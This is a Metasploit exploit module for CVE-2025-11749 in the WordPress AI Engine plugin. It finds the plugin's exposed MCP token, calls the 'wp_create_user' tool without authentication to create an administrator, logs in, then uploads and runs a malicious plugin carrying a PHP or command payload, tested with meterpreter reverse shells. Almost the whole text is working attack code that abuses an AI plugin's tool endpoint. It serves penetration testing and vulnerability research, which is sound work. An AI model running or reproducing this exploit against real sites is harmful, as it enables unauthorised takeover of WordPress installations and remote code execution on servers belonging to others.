## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Payload::Php include Msf::Exploit::FileDropper include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HTTP::Wordpress prepend Msf::Exploit::Remote::AutoCheck ERROR_PATTERN = /already exists|username.*taken|user.*exists/i SUCCESS_PATTERN = /User (?:created|updated|#\d+ updated)|success|created/i def initialize(info = {}) super( update_info( info, 'Name' => 'WordPress AI Engine Plugin MCP Unauthenticated Admin Creation to RCE', 'Description' => %q{ This module exploits an unauthenticated vulnerability in the WordPress AI Engine plugin (versions <= 3.1.3). The vulnerability allows an attacker to create an administrator account via the MCP (Model Context Protocol) endpoint without authentication. The module supports both `/wp-json/mcp/v1/` and `/?rest_route=/mcp/v1/` endpoints. Once an administrator account is created, the module uploads and executes a malicious plugin to achieve remote code execution (RCE). }, 'Author' => [ 'Emiliano Versini', # Vulnerability discovery 'Khaled Alenazi (Nxploited)', # PoC 'Valentin Lobstein ', # Metasploit module 'dledda-r7' # Reviewer ], 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2025-11749'], ['URL', 'https://github.com/Nxploited/CVE-2025-11749'] ], 'Platform' => %w[php unix linux win], 'Arch' => [ARCH_PHP, ARCH_CMD], 'DisclosureDate' => '2025-11-04', 'DefaultTarget' => 0, 'Privileged' => false, 'Targets' => [ [ 'PHP In-Memory', { 'Platform' => 'php', 'Arch' => ARCH_PHP # tested with php/meterpreter/reverse_tcp } ], [ 'Unix/Linux Command Shell', { 'Platform' => %w[unix linux], 'Arch' => ARCH_CMD # tested with cmd/linux/http/x64/meterpreter/reverse_tcp } ], [ 'Windows Command Shell', { 'Platform' => 'win', 'Arch' => ARCH_CMD # tested with cmd/windows/http/x64/meterpreter/reverse_tcp } ] ], 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] } ) ) register_options( [ OptString.new('USERNAME', [true, 'Username to create', Faker::Internet.username]), OptString.new('PASSWORD', [true, 'Password for the new user', Faker::Internet.password(min_length: 8)]), OptString.new('EMAIL', [true, 'Email for the new user', Faker::Internet.email]) ] ) end def check return CheckCode::Unknown unless wordpress_and_online? plugin_check = check_plugin_version_from_readme('ai-engine', '3.1.4') return plugin_check if plugin_check == CheckCode::Safe @token = find_token return CheckCode::Safe('MCP token not found. Plugin may be patched or not configured.') unless @token CheckCode::Appears end def exploit fail_with(Failure::NotFound, 'The target does not appear to be using WordPress') unless wordpress_and_online? @token ||= find_token fail_with(Failure::NotVulnerable, 'MCP token not found. Plugin may be patched or not configured.') unless @token username = datastore['USERNAME'] password = datastore['PASSWORD'] email = datastore['EMAIL'] result = create_admin_user(@token, username, password, email) fail_with(Failure::UnexpectedReply, 'Failed to create administrator account.') if result == false if result == :user_exists print_warning('User already exists, updating password and continuing exploitation...') update_user_password(@token, username, password) end admin_cookie = wordpress_login(username, password) unless admin_cookie error_msg = 'Failed to log in to WordPress admin.' error_msg += ' User may exist with a different password.' if result == :user_exists fail_with(Failure::UnexpectedReply, error_msg) end upload_and_execute_payload(admin_cookie) end # REST API helpers def send_rest_request(rest_path, method: 'GET', data: nil) opts = { 'method' => method, 'ctype' => method == 'POST' ? 'application/json' : nil, 'data' => data } uri = normalize_uri(target_uri.path, 'wp-json', rest_path) res = send_request_cgi(opts.merge('uri' => uri)) return res if res&.code == 200 vars_get = { 'rest_route' => rest_path } send_request_cgi(opts.merge('uri' => normalize_uri(target_uri.path), 'vars_get' => vars_get)) end def find_token extract_token_from_routes(send_rest_request('/')) end def extract_token_from_routes(res) return nil unless res&.code == 200 routes = res.get_json_document&.dig('routes') return nil unless routes.is_a?(Hash) mcp_regex = %r{^/mcp/v1/([^/]+)/sse$} routes.each_key do |route| next unless route.is_a?(String) match = route.match(mcp_regex) next unless match token = match[1] next if token == 'sse' || token.empty? return token end nil end # MCP API helpers def send_mcp_request(token, segments, method: 'GET', data: nil) path = "/mcp/v1/#{token}/#{segments.join('/')}" send_rest_request(path, method: method, data: data) end def build_mcp_payload(tool_name, arguments) { 'jsonrpc' => '2.0', 'id' => rand(1..999_999), 'method' => 'tools/call', 'params' => { 'name' => tool_name, 'arguments' => arguments } }.to_json end def send_mcp_tool_call_raw(token, tool_name, arguments) payload = build_mcp_payload(tool_name, arguments) res = send_mcp_request(token, ['sse'], method: 'POST', data: payload) return nil unless res return nil unless res.code == 200 json_response = res.get_json_document return nil unless json_response.is_a?(Hash) json_response.dig('result', 'content') end def send_mcp_tool_call(token, tool_name, arguments) payload = build_mcp_payload(tool_name, arguments) res = send_mcp_request(token, ['sse'], method: 'POST', data: payload) return false unless res return true if res.code == 204 return false unless res.code == 200 json_response = res.get_json_document return false unless json_response.is_a?(Hash) error = json_response['error'] return :user_exists if error.is_a?(Hash) && error['code'] == 'existing_user_login' return :user_exists if error.is_a?(Hash) && error['message']&.match?(ERROR_PATTERN) result_content = json_response.dig('result', 'content') return true if result_content&.any? { |item| item['text']&.match?(SUCCESS_PATTERN) } body = res.body.to_s return :user_exists if body =~ ERROR_PATTERN return true if body =~ SUCCESS_PATTERN false end # User management def get_user_id(token, username) arguments = { 'search' => username, 'search_columns' => ['user_login'] } result_content = send_mcp_tool_call_raw(token, 'wp_get_users', arguments) return nil unless result_content.is_a?(Array) result_content.each do |item| next unless item.is_a?(Hash) && item['text'] text = item['text'].to_s begin users = JSON.parse(text) users = [users] unless users.is_a?(Array) user = users.find { |u| u['user_login'] == username } return user['ID'].to_i if user && user['ID'] rescue JSON::ParserError next end end nil end def create_admin_user(token, username, password, email) arguments = { 'user_login' => username, 'user_email' => email, 'user_pass' => password, 'role' => 'administrator' } send_mcp_tool_call(token, 'wp_create_user', arguments) end def update_user_password(token, username, password) user_id = get_user_id(token, username) return false unless user_id arguments = { 'ID' => user_id, 'fields' => { 'user_pass' => password } } result = send_mcp_tool_call(token, 'wp_update_user', arguments) print_warning('Password update may have failed, attempting login anyway...') unless result result end # Payload execution def upload_and_execute_payload(admin_cookie) plugin_name = "wp_#{Rex::Text.rand_text_alphanumeric(5).downcase}" payload_name = "ajax_#{Rex::Text.rand_text_alphanumeric(5).downcase}" zip = generate_plugin(plugin_name, payload_name) fail_with(Failure::UnexpectedReply, 'Failed to upload the payload') unless wordpress_upload_plugin(plugin_name, zip.pack, admin_cookie) register_files_for_cleanup("#{payload_name}.php", "#{plugin_name}.php") register_dir_for_cleanup("../#{plugin_name}") payload_file = "#{payload_name}.php" payload_uri = normalize_uri(wordpress_url_plugins, plugin_name, payload_file) send_request_cgi('uri' => payload_uri, 'method' => 'GET') end end